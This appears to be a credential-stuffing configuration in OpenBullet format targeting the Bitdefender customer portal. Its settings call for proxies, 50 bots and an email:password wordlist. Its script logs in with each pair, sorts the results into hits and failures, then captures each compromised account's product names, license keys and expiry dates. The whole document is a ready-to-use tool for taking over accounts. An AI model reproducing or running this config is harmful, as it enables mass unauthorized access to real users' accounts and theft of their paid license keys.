[SETTINGS]
{
  "Name": "Bitdefender",
  "SuggestedBots": 50,
  "LastModified": "2018-08-12T19:20:19.3949456+00:00",
  "AdditionalInfo": "",
  "Author": "Praveen",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_PAGE REQUEST GET "https://my.bitdefender.com/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://my.bitdefender.com/login" 
  HEADER "Host: my.bitdefender.com" 
#LOGIN REQUEST GET "https://my.bitdefender.com/lv2/account?login=<USER>&pass=<PASS>&action=login&type=userpass&fp=web" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "\"error\": \"wrong_login\"" 
  KEYCHAIN Success OR 
    KEY "\"token\": \"" 
#TOKEN PARSE "<SOURCE>" LR "\"token\": \"" "\"" Recursive=FALSE -> VAR "TOKEN" "" "" 
#GET_INFO REQUEST GET "https://my.bitdefender.com/lv2/get_info?login=<USER>&token=<TOKEN>&fields=serials%2Caccount" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "\"product_name\": \"" 
  KEYCHAIN Failure OR 
    KEY "\"wrong_login\"" 
#PRODUCT_NAME PARSE "<SOURCE>" LR "\"product_name\": \"" "\"" Recursive=TRUE -> CAP "PRODUCT NAME" "" "" 
#KEY PARSE "<SOURCE>" LR "\"key\": \"" "\"" Recursive=TRUE -> CAP "KEY" "" "" 
#EXPIRE PARSE "<SOURCE>" LR "expire_time\": " "," Recursive=TRUE -> VAR "EXPIRE" "" "" 
#EXPIRE FUNCTION UnixTimeToISO8601 "<EXPIRE>" -> CAP "EXPIRE" 
